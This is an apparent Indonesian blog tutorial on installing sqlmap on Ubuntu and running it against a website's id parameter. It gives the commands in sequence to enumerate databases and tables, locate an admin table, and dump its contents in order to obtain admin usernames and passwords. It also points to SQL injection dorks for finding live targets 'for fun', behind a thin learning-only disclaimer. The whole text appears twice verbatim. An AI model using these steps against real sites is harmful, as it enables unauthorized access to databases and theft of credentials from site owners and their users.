cara install sqlmap di ubuntu:
sqlmap injection adalah satu tool untuk mengetahui kelemahan suatu website dengan melakukan serangkaian test dengan sql injection,dengan sqlmap ini. anda dapat mengetahui user dan password website
yang adalah celahnya,dan saya menulis sqlmap di ubuntu ini hanya sekedar pengetahuan dan pembelajaran semata,diluar itu semua saya tidak bertanggung jawab.
buka terminal ketik $ sudo apt-get install sqlmap
tunggu sampe installasi selesai lalu ketik $ sqlmap
setelah itu ketik $usr/bin/sqlmap [options]
contoh $ usr/bin/sqlmap -u http://contoh.com/index.php?id=9 --dbs
setelah itu kita bisa mengetahui nama databasenya ketik
$ usr/bin/sqlmap -u http://contoh.com/index.php?id=9 -D namadatabasenya --tables.
nanti akan muncul nama-nama tables dari databasenya,kalo udah begitu cari ajah yang kira-kira ada user dan password adminnya contoh :
$ usr/bin/sqlmap -u http://contoh.com/index.php?id=9 -D namadatabasenya -T admin --columns nah... kalo udah begini udah mulai kelihatan ketik
$ usr/bin/sqlmap -u http://contoh.com/index.php?id=9 -D namadatabasenya --dump
terserah anda mau diapain kalo sudah begini,tapi menurut saya jadilah manusia yang saling menghargai satu dengan sesama...
kalo mau coba ada beberapa dork sql injection yang masih bisa dimanfaatkan untuk fun saja,anda bisa melihatnya dork sql injaction disini,,,
nb: dari newbie untuk newbie,yang senior lewat ajah mang... :D
sqlmap injection adalah satu tool untuk mengetahui kelemahan suatu website dengan melakukan serangkaian test dengan sql injection,dengan sqlmap ini. anda dapat mengetahui user dan password website
yang adalah celahnya,dan saya menulis sqlmap di ubuntu ini hanya sekedar pengetahuan dan pembelajaran semata,diluar itu semua saya tidak bertanggung jawab.
buka terminal ketik $ sudo apt-get install sqlmap
tunggu sampe installasi selesai lalu ketik $ sqlmap
setelah itu ketik $usr/bin/sqlmap [options]
contoh $ usr/bin/sqlmap -u http://contoh.com/index.php?id=9 --dbs
setelah itu kita bisa mengetahui nama databasenya ketik
$ usr/bin/sqlmap -u http://contoh.com/index.php?id=9 -D namadatabasenya --tables.
nanti akan muncul nama-nama tables dari databasenya,kalo udah begitu cari ajah yang kira-kira ada user dan password adminnya contoh :
$ usr/bin/sqlmap -u http://contoh.com/index.php?id=9 -D namadatabasenya -T admin --columns nah... kalo udah begini udah mulai kelihatan ketik
$ usr/bin/sqlmap -u http://contoh.com/index.php?id=9 -D namadatabasenya --dump
terserah anda mau diapain kalo sudah begini,tapi menurut saya jadilah manusia yang saling menghargai satu dengan sesama...
kalo mau coba ada beberapa dork sql injection yang masih bisa dimanfaatkan untuk fun saja,anda bisa melihatnya dork sql injaction disini,,,
nb: dari newbie untuk newbie,yang senior lewat ajah mang... :D